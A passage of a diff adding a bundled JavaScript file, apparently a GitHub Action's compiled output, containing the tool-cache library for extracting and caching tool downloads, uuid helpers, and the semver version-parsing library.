+ const powershellCommand = [ + `$ErrorActionPreference = 'Stop' ;`, + `try { Add-Type -AssemblyName System.IO.Compression.FileSystem } catch { } ;`, + `if ((Get-Command -Name Expand-Archive -Module Microsoft.PowerShell.Archive -ErrorAction Ignore)) { Expand-Archive -LiteralPath '${escapedFile}' -DestinationPath '${escapedDest}' -Force }`, + `else {[System.IO.Compression.ZipFile]::ExtractToDirectory('${escapedFile}', '${escapedDest}', $true) }` + ].join(' '); + const args = [ + '-NoLogo', + '-Sta', + '-NoProfile', + '-NonInteractive', + '-ExecutionPolicy', + 'Unrestricted', + '-Command', + powershellCommand + ]; + const powershellPath = yield io.which('powershell', true); + core.debug(`Using powershell at path: ${powershellPath}`); + yield exec_1.exec(`"${powershellPath}"`, args); + } + }); +} +function extractZipNix(file, dest) { + return __awaiter(this, void 0, void 0, function* () { + const unzipPath = yield io.which('unzip', true); + const args = [file]; + if (!core.isDebug()) { + args.unshift('-q'); + } + args.unshift('-o'); //overwrite with -o, otherwise a prompt is shown which freezes the run + yield exec_1.exec(`"${unzipPath}"`, args, { cwd: dest }); + }); +} +/** + * Caches a directory and installs it into the tool cacheDir + * + * @param sourceDir the directory to cache into tools + * @param tool tool name + * @param version version of the tool. semver format + * @param arch architecture of the tool. Optional. Defaults to machine architecture + */ +function cacheDir(sourceDir, tool, version, arch) { + return __awaiter(this, void 0, void 0, function* () { + version = semver.clean(version) || version; + arch = arch || os.arch(); + core.debug(`Caching tool ${tool} ${version} ${arch}`); + core.debug(`source dir: ${sourceDir}`); + if (!fs.statSync(sourceDir).isDirectory()) { + throw new Error('sourceDir is not a directory'); + } + // Create the tool dir + const destPath = yield _createToolPath(tool, version, arch); + // copy each child item. do not move. move can fail on Windows + // due to anti-virus software having an open handle on a file. + for (const itemName of fs.readdirSync(sourceDir)) { + const s = path.join(sourceDir, itemName); + yield io.cp(s, destPath, { recursive: true }); + } + // write .complete + _completeToolPath(tool, version, arch); + return destPath; + }); +} +exports.cacheDir = cacheDir; +/** + * Caches a downloaded file (GUID) and installs it + * into the tool cache with a given targetName + * + * @param sourceFile the file to cache into tools. Typically a result of downloadTool which is a guid. + * @param targetFile the name of the file name in the tools directory + * @param tool tool name + * @param version version of the tool. semver format + * @param arch architecture of the tool. Optional. Defaults to machine architecture + */ +function cacheFile(sourceFile, targetFile, tool, version, arch) { + return __awaiter(this, void 0, void 0, function* () { + version = semver.clean(version) || version; + arch = arch || os.arch(); + core.debug(`Caching tool ${tool} ${version} ${arch}`); + core.debug(`source file: ${sourceFile}`); + if (!fs.statSync(sourceFile).isFile()) { + throw new Error('sourceFile is not a file'); + } + // create the tool dir + const destFolder = yield _createToolPath(tool, version, arch); + // copy instead of move. move can fail on Windows due to + // anti-virus software having an open handle on a file. + const destPath = path.join(destFolder, targetFile); + core.debug(`destination file ${destPath}`); + yield io.cp(sourceFile, destPath); + // write .complete + _completeToolPath(tool, version, arch); + return destFolder; + }); +} +exports.cacheFile = cacheFile; +/** + * Finds the path to a tool version in the local installed tool cache + * + * @param toolName name of the tool + * @param versionSpec version of the tool + * @param arch optional arch. defaults to arch of computer + */ +function find(toolName, versionSpec, arch) { + if (!toolName) { + throw new Error('toolName parameter is required'); + } + if (!versionSpec) { + throw new Error('versionSpec parameter is required'); + } + arch = arch || os.arch(); + // attempt to resolve an explicit version + if (!isExplicitVersion(versionSpec)) { + const localVersions = findAllVersions(toolName, arch); + const match = evaluateVersions(localVersions, versionSpec); + versionSpec = match; + } + // check for the explicit version in the cache + let toolPath = ''; + if (versionSpec) { + versionSpec = semver.clean(versionSpec) || ''; + const cachePath = path.join(_getCacheDirectory(), toolName, versionSpec, arch); + core.debug(`checking cache: ${cachePath}`); + if (fs.existsSync(cachePath) && fs.existsSync(`${cachePath}.complete`)) { + core.debug(`Found tool in cache ${toolName} ${versionSpec} ${arch}`); + toolPath = cachePath; + } + else { + core.debug('not found'); + } + } + return toolPath; +} +exports.find = find; +/** + * Finds the paths to all versions of a tool that are installed in the local tool cache + * + * @param toolName name of the tool + * @param arch optional arch. defaults to arch of computer + */ +function findAllVersions(toolName, arch) { + const versions = []; + arch = arch || os.arch(); + const toolPath = path.join(_getCacheDirectory(), toolName); + if (fs.existsSync(toolPath)) { + const children = fs.readdirSync(toolPath); + for (const child of children) { + if (isExplicitVersion(child)) { + const fullPath = path.join(toolPath, child, arch || ''); + if (fs.existsSync(fullPath) && fs.existsSync(`${fullPath}.complete`)) { + versions.push(child); + } + } + } + } + return versions; +} +exports.findAllVersions = findAllVersions; +function getManifestFromRepo(owner, repo, auth, branch = 'master') { + return __awaiter(this, void 0, void 0, function* () { + let releases = []; + const treeUrl = `https://api.github.com/repos/${owner}/${repo}/git/trees/${branch}`; + const http = new httpm.HttpClient('tool-cache'); + const headers = {}; + if (auth) { + core.debug('set auth'); + headers.authorization = auth; + } + const response = yield http.getJson(treeUrl, headers); + if (!response.result) { + return releases; + } + let manifestUrl = ''; + for (const item of response.result.tree) { + if (item.path === 'versions-manifest.json') { + manifestUrl = item.url; + break; + } + } + headers['accept'] = 'application/vnd.github.VERSION.raw'; + let versionsRaw = yield (yield http.get(manifestUrl, headers)).readBody(); + if (versionsRaw) { + // shouldn't be needed but protects against invalid json saved with BOM + versionsRaw = versionsRaw.replace(/^\uFEFF/, ''); + try { + releases = JSON.parse(versionsRaw); + } + catch (_a) { + core.debug('Invalid json'); + } + } + return releases; + }); +} +exports.getManifestFromRepo = getManifestFromRepo; +function findFromManifest(versionSpec, stable, manifest, archFilter = os.arch()) { + return __awaiter(this, void 0, void 0, function* () { + // wrap the internal impl + const match = yield mm._findMatch(versionSpec, stable, manifest, archFilter); + return match; + }); +} +exports.findFromManifest = findFromManifest; +function _createExtractFolder(dest) { + return __awaiter(this, void 0, void 0, function* () { + if (!dest) { + // create a temp dir + dest = path.join(_getTempDirectory(), v4_1.default()); + } + yield io.mkdirP(dest); + return dest; + }); +} +function _createToolPath(tool, version, arch) { + return __awaiter(this, void 0, void 0, function* () { + const folderPath = path.join(_getCacheDirectory(), tool, semver.clean(version) || version, arch || ''); + core.debug(`destination ${folderPath}`); + const markerPath = `${folderPath}.complete`; + yield io.rmRF(folderPath); + yield io.rmRF(markerPath); + yield io.mkdirP(folderPath); + return folderPath; + }); +} +function _completeToolPath(tool, version, arch) { + const folderPath = path.join(_getCacheDirectory(), tool, semver.clean(version) || version, arch || ''); + const markerPath = `${folderPath}.complete`; + fs.writeFileSync(markerPath, ''); + core.debug('finished caching tool'); +} +/** + * Check if version string is explicit + * + * @param versionSpec version string to check + */ +function isExplicitVersion(versionSpec) { + const c = semver.clean(versionSpec) || ''; + core.debug(`isExplicit: ${c}`); + const valid = semver.valid(c) != null; + core.debug(`explicit? ${valid}`); + return valid; +} +exports.isExplicitVersion = isExplicitVersion; +/** + * Get the highest satisfiying semantic version in `versions` which satisfies `versionSpec` + * + * @param versions array of versions to evaluate + * @param versionSpec semantic version spec to satisfy + */ +function evaluateVersions(versions, versionSpec) { + let version = ''; + core.debug(`evaluating ${versions.length} versions`); + versions = versions.sort((a, b) => { + if (semver.gt(a, b)) { + return 1; + } + return -1; + }); + for (let i = versions.length - 1; i >= 0; i--) { + const potential = versions[i]; + const satisfied = semver.satisfies(potential, versionSpec); + if (satisfied) { + version = potential; + break; + } + } + if (version) { + core.debug(`matched: ${version}`); + } + else { + core.debug('match not found'); + } + return version; +} +exports.evaluateVersions = evaluateVersions; +/** + * Gets RUNNER_TOOL_CACHE + */ +function _getCacheDirectory() { + const cacheDirectory = process.env['RUNNER_TOOL_CACHE'] || ''; + assert_1.ok(cacheDirectory, 'Expected RUNNER_TOOL_CACHE to be defined'); + return cacheDirectory; +} +/** + * Gets RUNNER_TEMP + */ +function _getTempDirectory() { + const tempDirectory = process.env['RUNNER_TEMP'] || ''; + assert_1.ok(tempDirectory, 'Expected RUNNER_TEMP to be defined'); + return tempDirectory; +} +/** + * Gets a global variable + */ +function _getGlobal(key, defaultValue) { + /* eslint-disable @typescript-eslint/no-explicit-any */ + const value = global[key]; + /* eslint-enable @typescript-eslint/no-explicit-any */ + return value !== undefined ? value : defaultValue; +} +/** + * Returns an array of unique values. + * @param values Values to make unique. + */ +function _unique(values) { + return Array.from(new Set(values)); +} +//# sourceMappingURL=tool-cache.js.map + +/***/ }), + +/***/ 7701: +/***/ ((module) => { + +/** + * Convert array of 16 byte values to UUID string format of the form: + * XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX + */ +var byteToHex = []; +for (var i = 0; i < 256; ++i) { + byteToHex[i] = (i + 0x100).toString(16).substr(1); +} + +function bytesToUuid(buf, offset) { + var i = offset || 0; + var bth = byteToHex; + // join used to fix memory issue caused by concatenation: https://bugs.chromium.org/p/v8/issues/detail?id=3175#c4 + return ([ + bth[buf[i++]], bth[buf[i++]], + bth[buf[i++]], bth[buf[i++]], '-', + bth[buf[i++]], bth[buf[i++]], '-', + bth[buf[i++]], bth[buf[i++]], '-', + bth[buf[i++]], bth[buf[i++]], '-', + bth[buf[i++]], bth[buf[i++]], + bth[buf[i++]], bth[buf[i++]], + bth[buf[i++]], bth[buf[i++]] + ]).join(''); +} + +module.exports = bytesToUuid; + + +/***/ }), + +/***/ 7269: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +// Unique ID creation requires a high quality random # generator. In node.js +// this is pretty straight-forward - we use the crypto API. + +var crypto = __nccwpck_require__(6113); + +module.exports = function nodeRNG() { + return crypto.randomBytes(16); +}; + + +/***/ }), + +/***/ 7468: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +var rng = __nccwpck_require__(7269); +var bytesToUuid = __nccwpck_require__(7701); + +function v4(options, buf, offset) { + var i = buf && offset || 0; + + if (typeof(options) == 'string') { + buf = options === 'binary' ? new Array(16) : null; + options = null; + } + options = options || {}; + + var rnds = options.random || (options.rng || rng)(); + + // Per 4.4, set bits for version and `clock_seq_hi_and_reserved` + rnds[6] = (rnds[6] & 0x0f) | 0x40; + rnds[8] = (rnds[8] & 0x3f) | 0x80; + + // Copy bytes to buffer, if provided + if (buf) { + for (var ii = 0; ii < 16; ++ii) { + buf[i + ii] = rnds[ii]; + } + } + + return buf || bytesToUuid(rnds); +} + +module.exports = v4; + + +/***/ }), + +/***/ 5911: +/***/ ((module, exports) => { + +exports = module.exports = SemVer + +var debug +/* istanbul ignore next */ +if (typeof process === 'object' && + process.env && + process.env.NODE_DEBUG && + /\bsemver\b/i.test(process.env.NODE_DEBUG)) { + debug = function () { + var args = Array.prototype.slice.call(arguments, 0) + args.unshift('SEMVER') + console.log.apply(console, args) + } +} else { + debug = function () {} +} + +// Note: this is the semver.org version of the spec that it implements +// Not necessarily the package version of this code. +exports.SEMVER_SPEC_VERSION = '2.0.0' + +var MAX_LENGTH = 256 +var MAX_SAFE_INTEGER = Number.MAX_SAFE_INTEGER || + /* istanbul ignore next */ 9007199254740991 + +// Max safe segment length for coercion. +var MAX_SAFE_COMPONENT_LENGTH = 16 + +var MAX_SAFE_BUILD_LENGTH = MAX_LENGTH - 6 + +// The actual regexps go on exports.re +var re = exports.re = [] +var safeRe = exports.safeRe = [] +var src = exports.src = [] +var t = exports.tokens = {} +var R = 0 + +function tok (n) { + t[n] = R++ +} + +var LETTERDASHNUMBER = '[a-zA-Z0-9-]' + +// Replace some greedy regex tokens to prevent regex dos issues. These regex are +// used internally via the safeRe object since all inputs in this library get +// normalized first to trim and collapse all extra whitespace. The original +// regexes are exported for userland consumption and lower level usage. A +// future breaking change could export the safer regex only with a note that +// all input should have extra whitespace removed. +var safeRegexReplacements = [ + ['\\s', 1], + ['\\d', MAX_LENGTH], + [LETTERDASHNUMBER, MAX_SAFE_BUILD_LENGTH], +] + +function makeSafeRe (value) { + for (var i = 0; i < safeRegexReplacements.length; i++) { + var token = safeRegexReplacements[i][0] + var max = safeRegexReplacements[i][1] + value = value + .split(token + '*').join(token + '{0,' + max + '}') + .split(token + '+').join(token + '{1,' + max + '}') + } + return value +} + +// The following Regular Expressions can be used for tokenizing, +// validating, and parsing SemVer version strings. + +// ## Numeric Identifier +// A single `0`, or a non-zero digit followed by zero or more digits. + +tok('NUMERICIDENTIFIER') +src[t.NUMERICIDENTIFIER] = '0|[1-9]\\d*' +tok('NUMERICIDENTIFIERLOOSE') +src[t.NUMERICIDENTIFIERLOOSE] = '\\d+' + +// ## Non-numeric Identifier +// Zero or more digits, followed by a letter or hyphen, and then zero or +// more letters, digits, or hyphens. + +tok('NONNUMERICIDENTIFIER') +src[t.NONNUMERICIDENTIFIER] = '\\d*[a-zA-Z-]' + LETTERDASHNUMBER + '*' + +// ## Main Version +// Three dot-separated numeric identifiers. + +tok('MAINVERSION') +src[t.MAINVERSION] = '(' + src[t.NUMERICIDENTIFIER] + ')\\.' + + '(' + src[t.NUMERICIDENTIFIER] + ')\\.' + + '(' + src[t.NUMERICIDENTIFIER] + ')' + +tok('MAINVERSIONLOOSE') +src[t.MAINVERSIONLOOSE] = '(' + src[t.NUMERICIDENTIFIERLOOSE] + ')\\.' + + '(' + src[t.NUMERICIDENTIFIERLOOSE] + ')\\.' + + '(' + src[t.NUMERICIDENTIFIERLOOSE] + ')' + +// ## Pre-release Version Identifier +// A numeric identifier, or a non-numeric identifier. + +tok('PRERELEASEIDENTIFIER') +src[t.PRERELEASEIDENTIFIER] = '(?:' + src[t.NUMERICIDENTIFIER] + + '|' + src[t.NONNUMERICIDENTIFIER] + ')' + +tok('PRERELEASEIDENTIFIERLOOSE') +src[t.PRERELEASEIDENTIFIERLOOSE] = '(?:' + src[t.NUMERICIDENTIFIERLOOSE] + + '|' + src[t.NONNUMERICIDENTIFIER] + ')' + +// ## Pre-release Version +// Hyphen, followed by one or more dot-separated pre-release version +// identifiers. + +tok('PRERELEASE') +src[t.PRERELEASE] = '(?:-(' + src[t.PRERELEASEIDENTIFIER] + + '(?:\\.' + src[t.PRERELEASEIDENTIFIER] + ')*))' + +tok('PRERELEASELOOSE') +src[t.PRERELEASELOOSE] = '(?:-?(' + src[t.PRERELEASEIDENTIFIERLOOSE] + + '(?:\\.' + src[t.PRERELEASEIDENTIFIERLOOSE] + ')*))' + +// ## Build Metadata Identifier +// Any combination of digits, letters, or hyphens. + +tok('BUILDIDENTIFIER') +src[t.BUILDIDENTIFIER] = LETTERDASHNUMBER + '+' + +// ## Build Metadata +// Plus sign, followed by one or more period-separated build metadata +// identifiers. + +tok('BUILD') +src[t.BUILD] = '(?:\\+(' + src[t.BUILDIDENTIFIER] + + '(?:\\.' + src[t.BUILDIDENTIFIER] + ')*))' + +// ## Full Version String +// A main version, followed optionally by a pre-release version and +// build metadata. + +// Note that the only major, minor, patch, and pre-release sections of +// the version string are capturing groups. The build metadata is not a +// capturing group, because it should not ever be used in version +// comparison. + +tok('FULL') +tok('FULLPLAIN') +src[t.FULLPLAIN] = 'v?' + src[t.MAINVERSION] + + src[t.PRERELEASE] + '?' + + src[t.BUILD] + '?' + +src[t.FULL] = '^' + src[t.FULLPLAIN] + '$' + +// like full, but allows v1.2.3 and =1.2.3, which people do sometimes. +// also, 1.0.0alpha1 (prerelease without the hyphen) which is pretty +// common in the npm registry. +tok('LOOSEPLAIN') +src[t.LOOSEPLAIN] = '[v=\\s]*' + src[t.MAINVERSIONLOOSE] + + src[t.PRERELEASELOOSE] + '?' + + src[t.BUILD] + '?' + +tok('LOOSE') +src[t.LOOSE] = '^' + src[t.LOOSEPLAIN] + '$' + +tok('GTLT') +src[t.GTLT] = '((?:<|>)?=?)' + +// Something like "2.*" or "1.2.x". +// Note that "x.x" is a valid xRange identifer, meaning "any version" +// Only the first item is strictly required. +tok('XRANGEIDENTIFIERLOOSE') +src[t.XRANGEIDENTIFIERLOOSE] = src[t.NUMERICIDENTIFIERLOOSE] + '|x|X|\\*' +tok('XRANGEIDENTIFIER') +src[t.XRANGEIDENTIFIER] = src[t.NUMERICIDENTIFIER] + '|x|X|\\*' + +tok('XRANGEPLAIN') +src[t.XRANGEPLAIN] = '[v=\\s]*(' + src[t.XRANGEIDENTIFIER] + ')' + + '(?:\\.(' + src[t.XRANGEIDENTIFIER] + ')' + + '(?:\\.(' + src[t.XRANGEIDENTIFIER] + ')' + + '(?:' + src[t.PRERELEASE] + ')?' + + src[t.BUILD] + '?' + + ')?)?' + +tok('XRANGEPLAINLOOSE') +src[t.XRANGEPLAINLOOSE] = '[v=\\s]*(' + src[t.XRANGEIDENTIFIERLOOSE] + ')' + + '(?:\\.(' + src[t.XRANGEIDENTIFIERLOOSE] + ')' + + '(?:\\.(' + src[t.XRANGEIDENTIFIERLOOSE] + ')' + + '(?:' + src[t.PRERELEASELOOSE] + ')?' + + src[t.BUILD] + '?' + + ')?)?' + +tok('XRANGE') +src[t.XRANGE] = '^' + src[t.GTLT] + '\\s*' + src[t.XRANGEPLAIN] + '$' +tok('XRANGELOOSE') +src[t.XRANGELOOSE] = '^' + src[t.GTLT] + '\\s*' + src[t.XRANGEPLAINLOOSE] + '$' + +// Coercion. +// Extract anything that could conceivably be a part of a valid semver +tok('COERCE') +src[t.COERCE] = '(^|[^\\d])' + + '(\\d{1,' + MAX_SAFE_COMPONENT_LENGTH + '})' + + '(?:\\.(\\d{1,' + MAX_SAFE_COMPONENT_LENGTH + '}))?' + + '(?:\\.(\\d{1,' + MAX_SAFE_COMPONENT_LENGTH + '}))?' + + '(?:$|[^\\d])' +tok('COERCERTL') +re[t.COERCERTL] = new RegExp(src[t.COERCE], 'g') +safeRe[t.COERCERTL] = new RegExp(makeSafeRe(src[t.COERCE]), 'g') + +// Tilde ranges. +// Meaning is "reasonably at or greater than" +tok('LONETILDE') +src[t.LONETILDE] = '(?:~>?)' + +tok('TILDETRIM') +src[t.TILDETRIM] = '(\\s*)' + src[t.LONETILDE] + '\\s+' +re[t.TILDETRIM] = new RegExp(src[t.TILDETRIM], 'g') +safeRe[t.TILDETRIM] = new RegExp(makeSafeRe(src[t.TILDETRIM]), 'g') +var tildeTrimReplace = '$1~' + +tok('TILDE') +src[t.TILDE] = '^' + src[t.LONETILDE] + src[t.XRANGEPLAIN] + '$' +tok('TILDELOOSE') +src[t.TILDELOOSE] = '^' + src[t.LONETILDE] + src[t.XRANGEPLAINLOOSE] + '$' + +// Caret ranges. +// Meaning is "at least and backwards compatible with" +tok('LONECARET') +src[t.LONECARET] = '(?:\\^)' + +tok('CARETTRIM') +src[t.CARETTRIM] = '(\\s*)' + src[t.LONECARET] + '\\s+' +re[t.CARETTRIM] = new RegExp(src[t.CARETTRIM], 'g') +safeRe[t.CARETTRIM] = new RegExp(makeSafeRe(src[t.CARETTRIM]), 'g') +var caretTrimReplace = '$1^' + +tok('CARET') +src[t.CARET] = '^' + src[t.LONECARET] + src[t.XRANGEPLAIN] + '$' +tok('CARETLOOSE') +src[t.CARETLOOSE] = '^' + src[t.LONECARET] + src[t.XRANGEPLAINLOOSE] + '$' + +// A simple gt/lt/eq thing, or just "" to indicate "any version" +tok('COMPARATORLOOSE') +src[t.COMPARATORLOOSE] = '^' + src[t.GTLT] + '\\s*(' + src[t.LOOSEPLAIN] + ')$|^$' +tok('COMPARATOR') +src[t.COMPARATOR] = '^' + src[t.GTLT] + '\\s*(' + src[t.FULLPLAIN] + ')$|^$' + +// An expression to strip any whitespace between the gtlt and the thing +// it modifies, so that `> 1.2.3` ==> `>1.2.3` +tok('COMPARATORTRIM') +src[t.COMPARATORTRIM] = '(\\s*)' + src[t.GTLT] + + '\\s*(' + src[t.LOOSEPLAIN] + '|' + src[t.XRANGEPLAIN] + ')' + +// this one has to use the /g flag +re[t.COMPARATORTRIM] = new RegExp(src[t.COMPARATORTRIM], 'g') +safeRe[t.COMPARATORTRIM] = new RegExp(makeSafeRe(src[t.COMPARATORTRIM]), 'g') +var comparatorTrimReplace = '$1$2$3' + +// Something like `1.2.3 - 1.2.4` +// Note that these all use the loose form, because they'll be +// checked against either the strict or loose comparator form +// later. +tok('HYPHENRANGE') +src[t.HYPHENRANGE] = '^\\s*(' + src[t.XRANGEPLAIN] + ')' + + '\\s+-\\s+' + + '(' + src[t.XRANGEPLAIN] + ')' + + '\\s*$' + +tok('HYPHENRANGELOOSE') +src[t.HYPHENRANGELOOSE] = '^\\s*(' + src[t.XRANGEPLAINLOOSE] + ')' + + '\\s+-\\s+' + + '(' + src[t.XRANGEPLAINLOOSE] + ')' + + '\\s*$' + +// Star ranges basically just allow anything at all. +tok('STAR') +src[t.STAR] = '(<|>)?=?\\s*\\*' + +// Compile to actual regexp objects. +// All are flag-free, unless they were created above with a flag. +for (var i = 0; i < R; i++) { + debug(i, src[i]) + if (!re[i]) { + re[i] = new RegExp(src[i]) + + // Replace all greedy whitespace to prevent regex dos issues. These regex are + // used internally via the safeRe object since all inputs in this library get + // normalized first to trim and collapse all extra whitespace. The original + // regexes are exported for userland consumption and lower level usage. A + // future breaking change could export the safer regex only with a note that + // all input should have extra whitespace removed. + safeRe[i] = new RegExp(makeSafeRe(src[i])) + } +} + +exports.parse = parse +function parse (version, options) { + if (!options || typeof options !== 'object') { + options = { + loose: !!options, + includePrerelease: false + } + } + + if (version instanceof SemVer) { + return version + } + + if (typeof version !== 'string') { + return null + } + + if (version.length > MAX_LENGTH) { + return null + } + + var r = options.loose ? safeRe[t.LOOSE] : safeRe[t.FULL] + if (!r.test(version)) { + return null + } + + try { + return new SemVer(version, options) + } catch (er) { + return null + } +} + +exports.valid = valid +function valid (version, options) { + var v = parse(version, options) + return v ? v.version : null +} + +exports.clean = clean +function clean (version, options) { + var s = parse(version.trim().replace(/^[=v]+/, ''), options) + return s ? s.version : null +} + +exports.SemVer = SemVer + +function SemVer (version, options) { + if (!options || typeof options !== 'object') { + options = { + loose: !!options, + includePrerelease: false + } + } + if (version instanceof SemVer) { + if (version.loose === options.loose) { + return version + } else { + version = version.version + } + } else if (typeof version !== 'string') { + throw new TypeError('Invalid Version: ' + version) + } + + if (version.length > MAX_LENGTH) { + throw new TypeError('version is longer than ' + MAX_LENGTH + ' characters') + } + + if (!(this instanceof SemVer)) { + return new SemVer(version, options) + } + + debug('SemVer', version, options) + this.options = options + this.loose = !!options.loose + + var m = version.trim().match(options.loose ? safeRe[t.LOOSE] : safeRe[t.FULL]) + + if (!m) { + throw new TypeError('Invalid Version: ' + version) + } + + this.raw = version + + // these are actually numbers + this.major = +m[1] + this.minor = +m[2] + this.patch = +m[3] + + if (this.major > MAX_SAFE_INTEGER || this.major < 0) { + throw new TypeError('Invalid major version') + } + + if (this.minor > MAX_SAFE_INTEGER || this.minor < 0) { + throw new TypeError('Invalid minor version') + } + + if (this.patch > MAX_SAFE_INTEGER || this.patch < 0) { + throw new TypeError('Invalid patch version') + } + + // numberify any prerelease numeric ids + if (!m[4]) { + this.prerelease = [] + } else { + this.prerelease = m[4].split('.').map(function (id) { + if (/^[0-9]+$/.test(id)) { + var num = +id + if (num >= 0 && num < MAX_SAFE_INTEGER) { + return num + } + } + return id + }) + } + + this.build = m[5] ? m[5].split('.') : [] + this.format() +} + +SemVer.prototype.format = function () { + this.version = this.major + '.' + this.minor + '.' + this.patch + if (this.prerelease.length) { + this.version += '-' + this.prerelease.join('.') + } + return this.version +} + +SemVer.prototype.toString = function () { + return this.version +} + +SemVer.prototype.compare = function (other) { + debug('SemVer.compare', this.version, this.options, other) + if (!(other instanceof SemVer)) { + other = new SemVer(other, this.options) + } + + return this.compareMain(other) || this.comparePre(other) +} + +SemVer.prototype.compareMain = function (other) { + if (!(other instanceof SemVer)) { + other = new SemVer(other, this.options) + } + + return compareIdentifiers(this.major, other.major) || + compareIdentifiers(this.minor, other.minor) || + compareIdentifiers(this.patch, other.patch) +} + +SemVer.prototype.comparePre = function (other) { + if (!(other instanceof SemVer)) { + other = new SemVer(other, this.options) + } + + // NOT having a prerelease is > having one + if (this.prerelease.length && !other.prerelease.length) { + return -1 + } else if (!this.prerelease.length && other.prerelease.length) { + return 1 + } else if (!this.prerelease.length && !other.prerelease.length) { + return 0 + } + + var i = 0 + do { + var a = this.prerelease[i] + var b = other.prerelease[i] + debug('prerelease compare', i, a, b) + if (a === undefined && b === undefined) { + return 0 + } else if (b === undefined) { + return 1 + } else if (a === undefined) { + return -1 + } else if (a === b) { + continue + } else { + return compareIdentifiers(a, b) + } + } while (++i) +} + +SemVer.prototype.compareBuild = function (other) { + if (!(other instanceof SemVer)) { + other = new SemVer(other, this.options) + } + + var i = 0 + do { + var a = this.build[i] + var b = other.build[i] + debug('prerelease compare', i, a, b) + if (a === undefined && b === undefined) { + return 0 + } else if (b === undefined) { + return 1 + } else if (a === undefined) { + return -1 + } else if (a === b) { + continue + } else { + return compareIdentifiers(a, b) + } + } while (++i) +} + +// preminor will bump the version up to the next minor release, and immediately +// down to pre-release. premajor and prepatch work the same way. +SemVer.prototype.inc = function (release, identifier) { + switch (release) { + case 'premajor': + this.prerelease.length = 0 + this.patch = 0 + this.minor = 0 + this.major++ + this.inc('pre', identifier) + break + case 'preminor': + this.prerelease.length = 0 + this.patch = 0 + this.minor++ + this.inc('pre', identifier) + break + case 'prepatch': + // If this is already a prerelease, it will bump to the next version + // drop any prereleases that might already exist, since they are not + // relevant at this point. + this.prerelease.length = 0 + this.inc('patch', identifier) + this.inc('pre', identifier) + break + // If the input is a non-prerelease version, this acts the same as + // prepatch. + case 'prerelease': + if (this.prerelease.length === 0) { + this.inc('patch', identifier) + } + this.inc('pre', identifier) + break + + case 'major': + // If this is a pre-major version, bump up to the same major version. + // Otherwise increment major. + // 1.0.0-5 bumps to 1.0.0 + // 1.1.0 bumps to 2.0.0 + if (this.minor !== 0 || + this.patch !== 0 || + this.prerelease.length === 0) { + this.major++ + } + this.minor = 0 + this.patch = 0 + this.prerelease = [] + break + case 'minor': + // If this is a pre-minor version, bump up to the same minor version. + // Otherwise increment minor. + // 1.2.0-5 bumps to 1.2.0 + // 1.2.1 bumps to 1.3.0 + if (this.patch !== 0 || this.prerelease.length === 0) { + this.minor++ + } + this.patch = 0 + this.prerelease = [] + break + case 'patch': + // If this is not a pre-release version, it will increment the patch. + // If it is a pre-release it will bump up to the same patch version. + // 1.2.0-5 patches to 1.2.0 + // 1.2.0 patches to 1.2.1 + if (this.prerelease.length === 0) { + this.patch++ + } + this.prerelease = [] + break + // This probably shouldn't be used publicly. + // 1.0.0 "pre" would become 1.0.0-0 which is the wrong direction. + case 'pre': + if (this.prerelease.length === 0) { + this.prerelease = [0] + } else { + var i = this.prerelease.length + while (--i >= 0) { + if (typeof this.prerelease[i] === 'number') { + this.prerelease[i]++ + i = -2 + } + } + if (i === -1) { + // didn't increment anything + this.prerelease.push(0) + } + } + if (identifier) { + // 1.2.0-beta.1 bumps to 1.2.0-beta.2, + // 1.2.0-beta.fooblz or 1.2.0-beta bumps to 1.2.0-beta.0 + if (this.prerelease[0] === identifier) { + if (isNaN(this.prerelease[1])) { + this.prerelease = [identifier, 0] + } + } else { + this.prerelease = [identifier, 0] + } + } + break + + default: + throw new Error('invalid increment argument: ' + release) + } + this.format() + this.raw = this.version + return this +} + +exports.inc = inc +function inc (version, release, loose, identifier) { + if (typeof (loose) === 'string') { + identifier = loose + loose = undefined + } + + try { + return new SemVer(version, loose).inc(release, identifier).version + } catch (er) { + return null + } +} + +exports.diff = diff +function diff (version1, version2) { + if (eq(version1, version2)) { + return null + } else { + var v1 = parse(version1) + var v2 = parse(version2) + var prefix = '' + if (v1.prerelease.length || v2.prerelease.length) { + prefix = 'pre' + var defaultResult = 'prerelease' + } + for (var key in v1) { + if (key === 'major' || key === 'minor' || key === 'patch') { + if (v1[key] !== v2[key]) { + return prefix + key + } + } + } + return defaultResult // may be undefined + } +} + +exports.compareIdentifiers = compareIdentifiers + +var numeric = /^[0-9]+$/ +function compareIdentifiers (a, b) { + var anum = numeric.test(a) + var bnum = numeric.test(b) + + if (anum && bnum) { + a = +a + b = +b + } + + return a === b ? 0 + : (anum && !bnum) ? -1 + : (bnum && !anum) ? 1 + : a < b ? -1 + : 1 +} + +exports.rcompareIdentifiers = rcompareIdentifiers +function rcompareIdentifiers (a, b) { + return compareIdentifiers(b, a) +} + +exports.major = major +function major (a, loose) { + return new SemVer(a, loose).major +} + +exports.minor = minor +function minor (a, loose) { + return new SemVer(a, loose).minor +} + +exports.patch = patch +function patch (a, loose) { + return new SemVer(a, loose).patch +} + +exports.compare = compare +function compare (a, b, loose) { + return new SemVer(a, loose).compare(new SemVer(b, loose)) +} + +exports.compareLoose = compareLoose +function compareLoose (a, b) { + return compare(a, b, true) +} + +exports.compareBuild = compareBuild +function compareBuild (a, b, loose) { + var versionA = new SemVer(a, loose) + var versionB = new SemVer(b, loose) + return versionA.compare(versionB) || versionA.compareBuild(versionB) +} + +exports.rcompare = rcompare +function rcompare (a, b, loose) { + return compare(b, a, loose) +} + +exports.sort = sort +function sort (list, loose) { + return list.sort(function (a, b) { + return exports.compareBuild(a, b, loose) + }) +} + +exports.rsort = rsort +function rsort (list, loose) { + return list.sort(function (a, b) { + return exports.compareBuild(b, a, loose) + }) +} + +exports.gt = gt +function gt (a, b, loose) { + return compare(a, b, loose) > 0 +} + +exports.lt = lt +function lt (a, b, loose) { + return compare(a, b, loose) < 0 +} + +exports.eq = eq +function eq (a, b, loose) { + return compare(a, b, loose) === 0 +} + +exports.neq = neq +function neq (a, b, loose) { + return compare(a, b, loose) !== 0 +} + +exports.gte = gte +function gte (a, b, loose) { + return compare(a, b, loose) >= 0 +} + +exports.lte = lte +function lte (a, b, loose) { + return compare(a, b, loose) <= 0 +} + +exports.cmp = cmp +function cmp (a, op, b, loose) { + switch (op) { + case '===': + if (typeof a === 'object') + a = a.version + if (typeof b === 'object') + b = b.version + return a === b + + case '!==': + if (typeof a === 'object') + a = a.version + if (typeof b === 'object') + b = b.version + return a 